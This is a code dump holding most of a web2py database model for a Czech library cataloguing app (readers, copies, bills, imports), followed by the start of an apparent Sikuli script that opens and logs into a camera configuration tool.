libstyle['lrik'] = 2/3/4/5/6\n notnull=True, default=3, requires=IS_INT_IN_RANGE(2, 7),\n label=T(\"Rychlá identifikace\"), comment=T(\"[DŮLEŽITÉ: později NEMĚNIT!] kolikamístné číslo používat pro rychlé hledání knihy z klávesnice? zvol podle velikosti knihovny: 2 - do počtu 50 výtisků, 3 - do 500, 4 - do 5000, 5 - do 50000, 6 - nad 50000\")),\n Field('st_imp_bc', 'boolean', notnull=True, default=False, # libstyle['bc'][0] = B\n label=T(\"Čarové kódy ?\"), comment=T(\"označte, pokud knihovna používá vlastní čarové kódy\")),\n Field('st_imp_bc2', 'boolean', notnull=True, default=True, # libstyle['bc'][1] = +\n label=T(\"Inkremetovat čar.kódy ?\"), comment=T(\"Ano: čarový kód více výtisků bude předvyplněn zvětšujícím se číslem; Ne: čar.kód 2+ výtisku doplníte ručně\")),\n Field('st_imp_pl', 'boolean', notnull=True, default=False, # libstyle['gr'][0] = P\n label=T(\"Umístění výtisku ?\"), comment=T(\"označte, pokud chcete zapisovat, kde je výtisk umístěn (oddělení, místnost, regál, apod.)\")),\n Field('st_imp_sg', 'boolean', notnull=True, default=False, # libstyle['sg'][0] = G\n label=T(\"Signatura výtisku ?\"), comment=T(\"označte, pokud používáte signatury a každý výtisk má mít unikátní\")),\n Field('st_imp_sgsep', 'string', length=3, notnull=True, default='', # libstyle['sgsep']\n label=T(\"Oddělovač v signatuře\"), comment=T(\"unikátní signatura výtisku (je-li použita): znak(y) pro oddělení dodatku\")),\n Field('st_imp_sgmod1', 'string', length=1, notnull=True, default='', # libstyle['sg'][1]\n label=T(\"Signatura, 1.výtisk\"), comment=T(\"unikátní signatura výtisku (je-li použita): přídavný znak 1.výtisku (např. prázdný, a, A, 1)\")),\n Field('st_imp_sgmod2', 'string', length=1, notnull=True, default='b', # libstyle['sg'][2]\n label=T(\"Signatura, 2.výtisk\"), comment=T(\"unikátní signatura výtisku (je-li použita): přídavný znak 2.výtisku (např. a, b, B, 2)\")),\n Field('st_imp_st', 'boolean', notnull=True, default=False, # libstyle['gr'][1] = s\n label=T(\"Stat.dělení výtisků ?\"), comment=T(\"označte, pokud chcete pro účel statistiky rozdělovat výtisky (tip: i pro oddělení dosp/děts, pokud výtisky titulu mohou být přiděleny do různých oddělení)\")),\n Field('st_tit_st', 'boolean', notnull=True, default=False, # libstyle['gr'][2] = S\n label=T(\"Stat.dělení titulů ?\"), comment=T(\"označte, pokud chcete pro účel statistiky rozdělovat tituly\")),\n Field('imp_total', 'integer', readable=False, default=0,\n label=T(\"Počet v importu\"), comment=T(\"počet publikací, které budou/byly celkově importovány\")),\n Field('imp_proc', 'decimal(5,2)', readable=False, writable=False, default=100.0), # import position in %\n Field('imp_done', 'integer', readable=False, default=0,\n label=T(\"Počet již importovaných\"), comment=T(\"počet již importovaných publikací celkem (nových i existujících)\")), # imp_done cnt\n Field('imp_new', 'integer', readable=False, default=0,\n label=T(\"Počet nových\"), comment=T(\"počet nových již importovaných publikací\")), # imp_new cnt\n Field('last_import', 'datetime', writable=False,\n label=T(\"Naposledy importováno\"), comment=T(\"čas posledního importu z jiného systému\")),\n format='%(library)s'\n )\n\ndb.define_table('auth_lib',\n Field('auth_user_id', db.auth_user,\n readable=True, writable=False,\n requires=IS_IN_DB(db, db.auth_user.id, '%(username)s'),\n ondelete='SET NULL',\n label=T(\"Uživatel\"), comment=T(\"uživatel\")),\n Field('library_id', db.library,\n readable=True, writable=False,\n requires=IS_IN_DB(db, db.library.id, '%(library)s'),\n ondelete='SET NULL',\n label=T(\"Knihovna\"), comment=T(\"přístup uživatele do knihovny\")),\n Field('rw', 'boolean', default=False,\n label=T(\"Pro zápis\"), comment=T(\"jsou povoleny změny dat v knihovně\")),\n common_filter=lambda query: db.auth_lib.auth_user_id == auth.user_id,\n format='user %(auth_user_id)s lib %(library_id)s'\n )\n\n# dočasně, dokud ladíme první knihovnu\n# TODO: nahradit mechanismem, kdy pro novou knihovnu bude povoleno, pro starou ověří mailem prvnímu uživateli\nif session.library_id:\n auth.library_id = session.library_id\nelif auth.is_logged_in():\n first_library = db(db.auth_lib.library_id).select().first()\n auth.library_id = first_library and first_library.library_id or None\nelse:\n auth.library_id = None\n\ndb.define_table('lib_rights',\n Field('auth_lib_id', db.auth_lib,\n readable=True, writable=False,\n requires=IS_IN_DB(db, db.auth_lib.id, 'user %(auth_user_id)s lib %(library_id)s'),\n ondelete='CASCADE',\n label=T(\"Přístup k\"), comment=T(\"vazba uživatele na knihovnu\")),\n Field('auth_user_id', db.auth_user,\n readable=True, writable=False,\n requires=IS_EMPTY_OR(IS_IN_DB(db, db.auth_user.id, '%(username)s')),\n ondelete='SET NULL',\n label=T(\"povolil\"), comment=T(\"oprávnění povolil ..\")),\n Field('allowed', 'string', length=1,\n readable=True, writable=False,\n requires=IS_IN_SET((('R', T(\"číst\")), ('W', T(\"zapisovat\")), ('A', T(\"admin\")))),\n label=T(\"Oprávnění\"), comment=T(\"oprávnění uživatele\")),\n Field('given', 'datetime',\n readable=True, writable=False,\n requires=[IS_NOT_EMPTY(), IS_DATETIME(format=T('%d.%m.%Y %H:%M'))],\n label=T(\"Založeno dne\"), comment=T(\"od kdy má oprávnění\")),\n )\n\ndb.define_table('rgroup',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=True, writable=False,\n ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('rgroup', 'string', length=48,\n notnull=True, requires=IS_NOT_EMPTY(),\n label=T(\"Skupina\"), comment=T(\"skupina čtenářů (např. pro školní knihovny školní třída\")),\n common_filter=lambda query: db.rgroup.library_id == auth.library_id,\n singular=T(\"skupina čtenářů\"), plural=T(\"skupiny čtenářů\"),\n format='%(rgroup)s'\n )\n\ndb.define_table('reader',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n ondelete='CASCADE',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('lastname', 'string', length=32,\n notnull=True, requires=IS_NOT_EMPTY(),\n label=T(\"Příjmení\"), comment=T(\"příjmení čtenáře\")),\n Field('firstname', 'string', length=32,\n label=T(\"Jméno\"), comment=T(\"křestní jméno čtenáře (a případně jeho/její další jména)\")),\n Field('rgroup_id', db.rgroup,\n requires=IS_EMPTY_OR(IS_IN_DB(db, db.rgroup.id, '%(rgroup)s')), ondelete='SET NULL',\n label=T(\"Skupina\"), comment=T(\"skupina čtenářů\")),\n Field('email', 'string', length=64,\n label=T(\"E-mail\"), comment=T(\"e-mail\")),\n common_filter=lambda query: db.reader.library_id == auth.library_id,\n singular=T(\"čtenář\"), plural=T(\"čtenáři\"),\n format='%(lastname)s %(firstname)s'\n )\n\ndb.define_table('place',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n ondelete='CASCADE',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('place', 'string', length=64,\n notnull=True, requires=IS_NOT_EMPTY(),\n label=T(\"Umístění\"),\n comment=T(\"umístění výtisků (např. regál, místnost nebo případně oddělení)\")),\n Field('place_id', 'reference place',\n ondelete='RESTRICT', represent=lambda id, row: id and id.place or '',\n label=T(\"Nadřazené\"), comment=T(\"patří do (širšího) umístění: takto lze vytvořit hierarchickou strukturu (oddělení, místnost, regál)\")),\n common_filter=lambda query: db.place.library_id == auth.library_id,\n singular=T(\"umístění##singular\"), plural=T(\"umístění##plural\"),\n format='%(place)s'\n )\n# TODO: čti on_define (book 6) při přechodu na lazy_tables\ndb.place.place_id.requires = IS_EMPTY_OR(IS_IN_DB(db, db.place.id, '%(place)s'))\n\ndb.define_table('stat_group',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n ondelete='CASCADE',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('tbl', 'string', length=1, default='I',\n notnull=True, requires=IS_IN_SET((('I', T(\"výtisky (exempláře)\")), ('T', T(\"publikace (tituly)\")),\n ('R', T(\"čtenáři\")))), #, ('B', T(\"výpůjčky\"))\n label=T(\"Účel\"), comment=T(\"ve kterém seznamu umožnit výběr této statistiky\")),\n Field('stat_group', 'string', length=48,\n notnull=True, requires=IS_NOT_EMPTY(),\n label=T(\"Kategorie\"), comment=T(\"statistická skupina, která se bude vyhodnocovat\")),\n common_filter=lambda query: (db.stat_group.library_id == auth.library_id) & (db.stat_group.tbl == 'I'),\n singular=T(\"statistická skupina\"), plural=T(\"statistická skupiny\"),\n format='%(stat_group)s'\n )\n\ndb.define_table('question',\n Field('auth_user_id', db.auth_user, default=auth.user_id,\n readable=False, writable=False,\n ondelete='CASCADE',\n label=T(\"Uživatel\"), comment=T(\"zadavatel dotazu\")),\n Field('question', 'string', length=PublLengths.question,\n requires=IS_LENGTH(minsize=PublLengths.question_min, maxsize=PublLengths.question,\n error_message=T(\"zadej %s až %s znaků\") % (PublLengths.question_min, PublLengths.question)),\n #UNIQUE_QUESTION()],\n label=T(\"Dotaz\")), # comment is dynamic in controller\n Field('asked', 'datetime',\n readable=False, writable=False,\n label=T(\"Zadáno\"), comment=T(\"čas zadání dotazu\")),\n Field('duration_z39', 'integer',\n readable=False, writable=False,\n label=T(\"Trvání stažení\"), comment=T(\"doba do dokončení stažení dat [s]\")),\n Field('duration_marc', 'integer',\n readable=False, writable=False,\n label=T(\"Trvání získání dat\"), comment=T(\"doba do uložení nalezených knih [s]\")),\n Field('duration_total', 'integer',\n readable=False, writable=False,\n label=T(\"Trvání celkem\"), comment=T(\"doba do vytvoření indexů [s]\")),\n Field('known', 'integer',\n readable=False, writable=False,\n label=T(\"Již známo\"), comment=T(\"počet lokálně známých publikací\")),\n Field('we_have', 'integer',\n readable=False, writable=False,\n label=T(\"Vlastněno\"), comment=T(\"počet vyhovujících publikací v knihovně uživatele\")),\n Field('retrieved', 'integer',\n readable=False, writable=False,\n label=T(\"Celkem získáno\"), comment=T(\"počet nalezených publikací\")),\n Field('inserted', 'integer',\n readable=False, writable=False,\n label=T(\"Nově získáno\"), comment=T(\"nových (dosud nestažených)\")),\n Field('live', 'boolean', default=True,\n readable=False, writable=False,\n label=T(\"Nezpracováno\"), comment=T(\"čeká se na odpověď nebo její použití (katalogizaci)\")),\n )\n\ndb.define_table('extsrc',\n Field('name', 'string',\n label=T(\"Pojmenování zdroje\"), comment=T(\"označení externího zdroje\")),\n Field('cls_read', 'string', length=64,\n label=T(\"Třída pro stažení\"), comment=T(\"jméno třídy pro stažení externího zdroje\")),\n Field('mod_read', 'string', length=64,\n label=T(\"Modul pro stažení\"), comment=T(\"modul třídy pro stažení externího zdroje\")),\n Field('cls_parse', 'string', length=64,\n label=T(\"Třída pro zpracování\"), comment=T(\"jméno třídy pro zpracování externího zdroje\")),\n Field('mod_parse', 'string', length=64,\n label=T(\"Modul pro zpracování\"), comment=T(\"modul třídy pro zpracování externího zdroje\")),\n Field('z39_server', 'string', length=64,\n label=T(\"z39 server\"), comment=T(\"url z39 serveru\")),\n Field('z39_port', 'string', length=8,\n label=T(\"z39 port\"), comment=T(\"port z39 serveru\")),\n Field('z39_database', 'string', length=64,\n label=T(\"z39 databáze\"), comment=T(\"databáze z39 serveru\")),\n Field('src_quality', 'integer', default=70, writable=False,\n label=T(\"Kvalita zdroje\"), comment=T(\"kvalita zdroje [%]\")),\n )\n\ndb.define_table('answer',\n Field('marc_id', 'integer', # type integer and default=1(Aleph/cz) as long we do not support more marc dialects\n default=1, label=T(\"MARC dialekt\"), comment=T(\"dialekt MARC jazyka\")), # TODO: obsolete? replaced by extsrc?\n Field('extsrc_id', db.extsrc,\n label=T(\"Externí zdroj\"), comment=T(\"externí zdroj (a formát) pro .marc\")),\n Field('md5publ', 'string', length=32,\n label=T(\"md5publ\"), comment=T(\"md5publ\")),\n Field('md5marc', 'string', length=32,\n label=T(\"md5marc\"), comment=T(\"md5marc\")),\n Field('z39stamp', 'datetime', writable=False,\n label=T(\"Čas dotazu\"), comment=T(\"čas dotazu na z39 službu\")),\n Field('ean', 'string', length=20,\n label=T(\"Čarový kód EAN\"), comment=T(\"čarový kód, vytištěný na publikaci nebo odpovídající ISBN\")),\n Field('ean_hidden', 'boolean', default=False,\n label=T(\"EAN neuveden\"), comment=T(\"EAN je odvozen z ISBN a není uveden na knize\")),\n Field('rik', 'string', length=PublLengths.rik,\n readable=False, writable=False,\n label=T(\"Rychlá identifikace\"), comment=T(\"rychlá identifikace knihy podle EAN (obrácené pořadí)\")),\n Field('country', 'string', length=PublLengths.country,\n label=T(\"Země vydání\"), comment=T(\"země vydání\")),\n Field('year_from', 'integer',\n label=T(\"Vydání od\"), comment=T(\"vydání od roku\")),\n Field('year_to', 'integer',\n label=T(\"Vydání do\"), comment=T(\"vydání do roku\")),\n Field('fastinfo', 'text',\n label=T(\"Hlavní údaje\"), comment=T(\"hlavní údaje\")),\n Field('src_quality', 'integer', default=30, writable=False,\n label=T(\"Kvalita zdroje\"), comment=T(\"kvalita zdroje [%]\")),\n Field('needindex', 'boolean', default=True, readable=False, writable=False),\n Field('marc', 'text',\n label=T(\"marc\"), comment=T(\"marc\")),\n )\n\ndb.define_table('rik2',\n Field('answer_id', db.answer, ondelete='CASCADE',\n label=T(\"Publikace\"), comment=T(\"publikace\")),\n Field('rik2', 'string', length=PublLengths.rik,\n readable=False, writable=False,\n label=T(\"Náhradní RIK\"), comment=T(\"náhradní rychlá identifikace knihy při později nalezeném EANu (obrácené pořadí)\")),\n )\n\ndb.define_table('authority',\n Field('name', 'string', length=96,\n label=T(\"Jméno\"), comment=T(\"příjmení (bez tagu) a jméno (s tagy podpole) autority\")),\n Field('atype', 'string', length=1, default=\"P\",\n requires=IS_EMPTY_OR(IS_IN_SET((('P', T(\"osoba\")), ('O', T(\"organizace, instituce\")), ('E', T(\"událost, akce\"))))),\n label=T(\"Typ autora\"), comment=T(\"P\")),\n Field('asex', 'string', length=1,\n requires=IS_EMPTY_OR(IS_IN_SET((('M', T(\"muž\")), ('W', T(\"žena\"))))),\n label=T(\"Pohlaví\"), comment=T(\"pohlaví autora (fyzické osoby)\")),\n Field('year1', 'integer',\n label=T(\"Narozen\"), comment=T(\"rok narození (nebo začátek existence) pro vyhledávání\")),\n Field('year2', 'integer',\n label=T(\"Zemřel\"), comment=T(\"rok úmrtí (nebo začátek existence) pro vyhledávání\")),\n Field('years', 'text',\n label=T(\"Roky\"), comment=T(\"život (nebo existence) v letech (uvést, pokud roky nejsou známy přesně)\")),\n Field('description', 'text',\n label=T(\"Další\"), comment=T(\"další informace\")),\n )\n\ndb.define_table('book_authority',\n Field('answer_id', db.answer, ondelete='CASCADE',\n label=T(\"Publikace\"), comment=T(\"publikace\")),\n Field('authority_id', db.authority,\n label=T(\"Autorita\"), comment=T(\"autorita\")),\n Field('role', 'string', length=PublLengths.irole,\n requires=IS_EMPTY_OR(IS_IN_SET((('aut', T(\"autor\")), ('ilu', T(\"ilustrátor\")),\n ('fot', T(\"fotograf\")), ('prk', T(\"překladatel\"))))),\n label=T(\"Role\"), comment=T(\"role\")),\n )\n\ndb.define_table('publisher',\n Field('name', 'string', length=128,\n label=T(\"Jméno\"), comment=T(\"Jméno nakladatele\")),\n Field('plocation', 'string', length=64,\n label=T(\"Sídlo\"), comment=T(\"Místo vydání\")),\n Field('country', 'string', length=PublLengths.country,\n label=T(\"Země vydání\"), comment=T(\"země vydání\")),\n Field('year1', 'integer',\n label=T(\"Začátek\"), comment=T(\"začátek působení\")),\n Field('year2', 'integer',\n label=T(\"Konec\"), comment=T(\"konec působení\")),\n )\n\ndb.define_table('book_publisher',\n Field('answer_id', db.answer, ondelete='CASCADE',\n label=T(\"Publikace\"), comment=T(\"publikace\")),\n Field('publisher_id', db.publisher,\n label=T(\"Nakladatel\"), comment=T(\"nakladatel\")),\n )\n\ndb.define_table('idx_long',\n Field('category', 'string', length=1,\n label=T(\"Kategorie\"), comment=T(\"kategorie (typ) vyhledávacího údaje\")),\n Field('item', 'string', length=PublLengths.ilong,\n label=T(\"Vyhledávací údaj\"), comment=T(\"údaj publikace (dlouhý)\")),\n )\n\ndb.define_table('idx_join',\n Field('answer_id', db.answer,\n ondelete='CASCADE',\n label=T(\"Odpověď\"), comment=T(\"příslušnost k odpovědi\")),\n Field('idx_long_id', db.idx_long,\n ondelete='CASCADE',\n label=T(\"Vyhledávací řetězec\"), comment=T(\"příslušnost k vyhledávacímu řetězci\")),\n Field('role', 'string', length=PublLengths.irole,\n label=T(\"Role\"), comment=T(\"role, pořadí v sérii, apod.\")),\n )\n\ndb.define_table('idx_short',\n Field('answer_id', db.answer,\n ondelete='CASCADE',\n label=T(\"Publikace\"), comment=T(\"příslušnost k publikaci\")),\n Field('category', 'string', length=1,\n label=T(\"Kategorie\"), comment=T(\"kategorie (typ) vyhledávacího údaje\")),\n Field('item', 'string', length=PublLengths.ishort,\n label=T(\"Vyhledávací údaj\"), comment=T(\"údaj publikace (krátký)\")),\n )\n\ndb.define_table('idx_word',\n Field('answer_id', db.answer,\n ondelete='CASCADE',\n label=T(\"Publikace\"), comment=T(\"příslušnost k publikaci\")),\n Field('word', 'string', length=PublLengths.iword,\n label=T(\"Vyhledávací údaj\"), comment=T(\"údaj publikace (krátký)\")),\n )\n\ndb.define_table('lib_descr',\n Field('answer_id', db.answer,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Odpověď\"), comment=T(\"příslušnost k odpovědi\")),\n Field('descr', 'text',\n label=T(\"Anotace\"), comment=T(\"anotace (v interpretaci knihovny)\")),\n )\n\nFOUND_AL_LBL = T(\"nalezen naposledy\")\nFOUND_AL_CMT = T(\"zda byl součástí minulého (neinkrementálního) importu\")\ndb.define_table('owned_book',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('answer_id', db.answer,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Odpověď\"), comment=T(\"příslušnost k odpovědi\")),\n Field('lib_descr_id', db.lib_descr,\n ondelete='RESTRICT',\n label=T(\"Popis\"), comment=T(\"bibliografický popis, pozměněný pro potřeby knihovny\")),\n Field('fastinfo', 'text',\n label=T(\"Hlavní údaje\"), comment=T(\"hlavní údaje (v interpretaci knihovny)\")),\n Field('cnt', 'integer',\n default=0,\n label=T(\"Výtisků\"), comment=T(\"počet výtisků v knihovně\")),\n Field('found_at_last', 'boolean', notnull=True, default=True,\n label=FOUND_AL_LBL, comment=FOUND_AL_CMT),\n common_filter=lambda query: (db.owned_book.library_id == auth.library_id) & (db.owned_book.cnt > 0),\n )\n\ndb.define_table('partner',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('name', 'string', length=48,\n notnull=True, requires=IS_NOT_EMPTY(),\n label=T(\"Název\"), comment=T(\"název nebo jméno obchodního partnera\")),\n Field('state_reg', 'string', length=16,\n label=T(\"IČO\"), comment=T(\"IČO/rč (státní identifikátor organizace nebo osoby)\")),\n Field('vat_reg', 'string', length=18,\n label=T(\"DIČ\"), comment=T(\"DIČ (daňový identifikátor organizace nebo osoby)\")),\n Field('street', 'string', length=48,\n label=T(\"Ulice\"), comment=T(\"adresa: ulice a č.domu\")),\n Field('place', 'string', length=48,\n label=T(\"Místo\"), comment=T(\"adresa: místo (město, obec)\")),\n Field('plz', 'string', length=8,\n label=T(\"PSČ\"), comment=T(\"poštovní směrovací číslo\")),\n Field('email', 'string', length=64,\n label=T(\"EMail\"), comment=T(\"hlavní emailová adresa\")),\n Field('link', 'string', length=92,\n label=T(\"Odkaz\"), comment=T(\"URL adresa (webové stránky, www)\")),\n Field('contact', 'text',\n label=T(\"Kontakt\"), comment=T(\"kontaktní osoba, telefony, další e-mailové adresy, apod.\")),\n common_filter=lambda query: db.partner.library_id == auth.library_id,\n format=lambda row: ', '.join((row.name, row.place))\n )\n\nbill_format = lambda row: ', '.join(filter(lambda item: item, (row['no_our'], row['htime'].strftime(dtformat)))) if row else ''\n # dict format row['..'] instead of Storage format must be used, because this is used for dict formatting too\ndb.define_table('bill',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('partner_id', db.partner,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Partner\"), comment=T(\"obchodní partner (např. dodavatel)\")),\n Field('take_in', 'boolean', notnull=True, default=True,\n label=T(\"Příjem\"), comment=T(\"nákup, získaný dar nebo přijatá MVS/zápůjčka (naskladňuji knihy)\")),\n Field('gift', 'boolean', notnull=True, default=False,\n label=T(\"Dar\"), comment=T(\"knihy trvale získané (nebo poskytnuté) darem\")),\n Field('loan', 'string', length=2,\n requires=IS_EMPTY_OR(IS_IN_SET(HACTIONS_MVS_HINT)),\n label=T(\"Zápůjčka\"), comment=T(\"(dočasná) meziknihovní výměna (MVS) nebo zápůjčka)\")),\n Field('no_our', 'string', length=16,\n label=T(\"Naše číslo\"), comment=T(\"naše číslo dokladu (nepovinné)\")),\n Field('no_partner', 'string', length=18,\n label=T(\"Jejich číslo\"), comment=T(\"číslo dokladu dodavatele nebo odběratele (nepovinné)\")),\n Field('htime', 'datetime', default=datetime.datetime.utcnow(),\n notnull=True,\n label=T(\"Čas\"), comment=T(\"čas nákupu (převodu, apod.); i když doklad obsahuje jen datum, je dobré zadat i přibližný čas, který se zapíše v historii výtisků\")),\n Field('cnt_imp', 'integer', notnull=True, default=0, writable=False,\n label=T(\"Výtisků\"), comment=T(\"počet výtisků, zadaných při zápisu dokladu\")),\n Field('btotal', 'decimal(12,2)',\n notnull=True,\n label=T(\"Částka\"), comment=T(\"celková částka na dokladu\")),\n Field('bcurrency', 'string', length=3, default=DEFAULT_CURRENCY,\n notnull=True, requires=IS_IN_SET(SUPPORTED_CURRENCIES),\n label=T(\"Měna\"), comment=T(\"měna\")),\n Field('imp_added', 'datetime', writable=False,\n label=T(\"Zpracován\"), comment=T(\"kdy byly zaznamenány všechny položky dokladu\")),\n common_filter=lambda query: db.bill.library_id == auth.library_id,\n format=bill_format\n )\n\ndb.define_table('impression',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('answer_id', db.answer,\n notnull=True, ondelete='RESTRICT',\n readable=False, writable=False,\n label=T(\"Odpověď\"), comment=T(\"příslušnost k odpovědi\")),\n Field('owned_book_id', db.owned_book,\n notnull=True, ondelete='RESTRICT',\n readable=False, writable=False,\n label=T(\"Publikace (vlastní)\"), comment=T(\"publikace - záznam, specifický pro tuto knihovnu\")),\n Field('place_id', db.place,\n requires=IS_EMPTY_OR(IS_IN_DB(db, db.place.id, '%(place)s')), ondelete='SET NULL',\n label=T(\"Umístění\"), comment=T(\"umístění výtisku\")),\n Field('live', 'boolean', default=True,\n readable=False, writable=False,\n label=T(\"Platný výtisk\"), comment=T(\"platný (nevyřazený) výtisk\")),\n Field('gift', 'boolean', notnull=True, default=False,\n label=T(\"Dar\"), comment=T(\"získáno darem\")),\n Field('loan', 'boolean', default=False,\n readable=False, writable=False,\n label=T(\"Dočasná zápůjčka\"), comment=T(\"meziknihovní vým��na (MVS) nebo zápůjčka\")),\n Field('iorder', 'integer',\n notnull=True, writable=False,\n label=T(\"Pořadové číslo\"), comment=T(\"pořadové číslo výtisku\")),\n Field('iid', 'string', length=PublLengths.iid,\n label=T(\"Přírůstkové číslo\"), comment=T(\"přírůstkové číslo\")),\n Field('sgn', 'string', length=PublLengths.sgn,\n label=T(\"Signatura\"), comment=T(\"signatura výtisku\")),\n Field('barcode', 'string', length=PublLengths.barcode,\n label=T(\"Čarový kód\"), comment=T(\"čarový kód výtisku\")),\n Field('registered', 'date', default=datetime.date.today(),\n notnull=True, writable=False,\n label=T(\"Evidován\"), comment=T(\"datum zápisu do počítačové evidence\")),\n Field('price_in', 'decimal(12,2)',\n label=T(\"Nákupní cena\"),\n comment=T(\"nákupní nebo pořizovací cena výtisku (přepočtená na %s)\") % (DEFAULT_CURRENCY)),\n Field('icondition', 'text',\n label=T(\"Stav\"), comment=T(\"stav výtisku, poškození\")),\n Field('htime', 'datetime', default=datetime.datetime.utcnow(),\n notnull=True, writable=False,\n label=T(\"Poslední manipulace\"), comment=T(\"čas poslední manipulace (v UTC)\")),\n Field('haction', 'string', length=2, default='+o',\n notnull=True, requires=IS_IN_SET(HACTIONS), writable=False,\n label=T(\"Poslední akce\"), comment=T(\"naposledy provedená činnost s výtiskem\")),\n Field('found_at_last', 'boolean', notnull=True, default=True,\n label=FOUND_AL_LBL, comment=FOUND_AL_CMT),\n common_filter=lambda query: (db.impression.library_id == auth.library_id) & (db.impression.live == True),\n format=T('čís.') + ' %(iorder)s'\n ) # htime, haction: redundant info for easier and faster access to the last impr_hist entry\n\ndb.define_table('impr_hist',\n Field('impression_id', db.impression,\n writable=False,\n notnull=True, ondelete='CASCADE',\n label=T(\"Výtisk\"), comment=T(\"výtisk publikace\")),\n Field('auth_user_id', db.auth_user, default=auth.user_id,\n writable=False,\n notnull=True, ondelete='SET NULL',\n label=T(\"Provedl\"), comment=T(\"uživatel, který provedl akci\")),\n Field('reader_id', db.reader,\n writable=False,\n ondelete='SET NULL',\n label=T(\"Čtenář\"), comment=T(\"čtenář\")),\n Field('bill_id', db.bill,\n writable=False,\n ondelete='RESTRICT',\n label=T(\"Doklad\"), comment=T(\"doklad (např. účtenka, faktura, soupiska zápůjčky)\")),\n Field('htime', 'datetime', default=datetime.datetime.utcnow(),\n notnull=True, writable=False,\n label=T(\"Čas\"), comment=T(\"čas akce (v UTC)\")),\n Field('haction', 'string', length=2, default='+o',\n notnull=True, requires=IS_IN_SET(HACTIONS), writable=False,\n label=T(\"Akce\"), comment=T(\"provedená činnost\")),\n )\n\ndb.define_table('import_run',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('scheduler_task_id', 'integer',\n readable=False, writable=False),\n Field('incremental', 'boolean', notnull=True, default=False,\n label=T(\"inkrementální\"), comment=T(\"pouze inkrementální import\")),\n Field('started', 'datetime', default=datetime.datetime.utcnow(),\n notnull=True, writable=False,\n label=T(\"Čas začátku\"), comment=T(\"čas zahájení importu\")),\n Field('finished', 'datetime', writable=False,\n label=T(\"Čas ukončení\"), comment=T(\"čas ukončení importu\")),\n Field('cnt_total', 'integer', writable=False,\n label=T(\"Publikací\"), comment=T(\"celkem zpracováno publikací\")),\n Field('cnt_new', 'integer', writable=False,\n label=T(\"Z toho nových\"), comment=T(\"z toho bylo nově přidáno publikací\")),\n Field('failed', 'boolean', default=False, writable=False,\n label=T(\"Nedokončeno\"), comment=T(\"import nebyl řádně dokončen\")),\n common_filter=lambda query: db.import_run.library_id == auth.library_id,\n )\n\ndb.define_table('import_redirect',\n Field('md5publ_computed', 'string', length=32,\n label=T(\"md5publ_computed\"), comment=T(\"md5publ_computed\")),\n Field('md5publ_final', 'string', length=32,\n label=T(\"md5publ_final\"), comment=T(\"md5publ_final\")),\n )\n\n'''\ndb.define_table('import_book',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('md5imp', 'string', length=32,\n label=T(\"md5imp\"), comment=T(\"md5imp\")),\n Field('found_at_last', 'boolean', notnull=True, default=True,\n label=FOUND_AL_LBL, comment=FOUND_AL_CMT),\n common_filter=lambda query: db.import_book.library_id == auth.library_id,\n )\n'''\n\ndef book_cnt_insert(flds, id):\n db((db.owned_book.id == flds['owned_book_id']) & (db.owned_book.library_id == auth.library_id),\n ignore_common_filters=True).update(cnt=db.owned_book.cnt + 1) # without filter as long it contain cnt>0\ndef book_cnt_update(w2set, flds):\n if 'live' in flds:\n impressions = w2set.select(db.impression.owned_book_id, db.impression.live)\n for impression in impressions:\n if impression.live is True and flds['live'] is False:\n db(db.owned_book.id == impression.owned_book_id).update(cnt=max(0, db.owned_book.cnt - 1))\n elif impression.live is False and flds['live'] is True:\n db(db.owned_book.id == impression.owned_book_id).update(cnt=db.owned_book.cnt + 1)\ndef book_cnt_delete(w2set):\n impressions = w2set.select(db.impression.owned_book_id, orderby=db.impression.owned_book_id)\n for key, group in groupby(impressions, lambda impression: impression.owned_book_id):\n db(db.owned_book.id == key).update(cnt=max(0, db.owned_book.cnt - len([bk for bk in group])))\ndb.impression._after_insert.append(book_cnt_insert)\ndb.impression._before_update.append(book_cnt_update)\ndb.impression._before_delete.append(book_cnt_delete)\n","repo_name":"zvolsky/codex2020","sub_path":"models/db_model.py","file_name":"db_model.py","file_ext":"py","file_size_in_byte":40714,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32433208129","text":"#oem 별 client focusing 및 ConfTool 실행\n\ndef focus_app(appName):\n global g2conftool\n g2conftool = App(appName)\n g2conftool.focus()\n\ndef openApp_logIn(path,image):\n check=str(g2conftool)\n if check[1]=='-':\n App.open(path)\n while not exists(image):\n wait(1)\n type(image,\"12345678\"+Key.ENTER) \n\n\n\noem=open(\"c:/sikuli/TestResult.txt\").read(1)\nif oem == \"I\":\n focus_app(\"G2ConfTool.exe\")\n openApp_logIn(\"C:\\IDIS Solution Suite\\Client\\G2ConfTool.exe\",Pattern(\"1486530419073.png\").similar(0.92))\n\nelse:\n focus_app(\"G2ConfTool.exe\")\n 